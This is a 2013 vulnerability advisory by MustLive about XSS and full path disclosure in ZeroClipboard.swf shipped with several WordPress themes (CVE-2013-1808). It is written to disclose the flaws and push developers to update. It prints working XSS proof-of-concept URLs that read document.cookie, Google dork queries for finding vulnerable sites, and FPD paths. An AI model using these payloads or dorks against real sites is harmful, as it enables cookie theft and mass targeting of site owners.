SecurityvulnsSECURITYVULNS:DOC:29320XSS and FPD vulnerabilities in ZeroClipboard in multiple themes for WordPress
Hello 3APA3A!
These are Cross-Site Scripting and Full path disclosure vulnerabilities in multiple themes for WordPress (with ZeroClipboard.swf).
Earlier I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote that this is very widespread flash-file and it's placed at tens of thousands of web sites. And it's used in hundreds of web applications.
After publishing this and two other advisories related to ZeroClipboard in February, I've published last month two new advisories (which I prepared in February). About vulnerabilities in WP plugins and in WP themes (with ZeroClipboard.swf).
This flash-file is used in hundreds of themes for WordPress (including custom themes for different sites). Among them are Montezuma, Striking, Couponpress, Azolla, Black and White. And there are many other vulnerable themes for WP with ZeroClipboard.swf. Also there is one theme which also contains ZeroClipboard10.swf.
SecurityVulns ID: 12910
CVE: CVE-2013-1808
Affected products:
Vulnerable are the next web applications (WordPress themes) with ZeroClipboard:
All versions of Montezuma, Striking, Couponpress, Azolla, Black and White.
Both XSS vulnerabilities in ZeroClipboard are fixed in the last version ZeroClipboard 1.1.7. All developers should update swf-file in their software. I wrote about developers who begun fixing these vulnerabilities in ZeroClipboard in their software (http://seclists.org/fulldisclosure/2013/Mar/207).
Details:
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into buffer (as described in previous advisory).
http://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
This is very widespread flash-file (both versions), as you can find out via Google dorks. If at searching by standard Goolge dork it's possible to find tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then at searching for themes for WordPress it's possible to find hundreds thousand of sites with these flash-files.
inurl:zeroclipboard.swf inurl:/wp-content/themes/ - about 70200 (in February, now more)
zeroclipboard.swf inurl:/wp-content/themes/ - about 85600 (in February, now more)
Full path disclosure (WASC-13):
All mentioned themes have FPD vulnerabilities in php-files (in index.php and others), which is typically for WP themes.
http://site/wp-content/themes/montezuma/
http://site/wp-content/themes/striking/
http://site/wp-content/themes/couponpress/
http://site/wp-content/themes/azolla/
http://site/wp-content/themes/black-and-white/
Timeline:
2013.02.19 - after contacting with old and new developers of ZeroClipboard, I disclosed vulnerabilities in ZeroClipboard to the lists.
2013.02 - in February I wrote two additional advisories about vulnerabilities in different web applications with ZeroClipboard to draw more attention to this issue concerned with hundreds of web applications.
2013.03.28 - disclosed vulnerabilities in multiple themes for WordPress at my site (http://websecurity.com.ua/6401/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Related
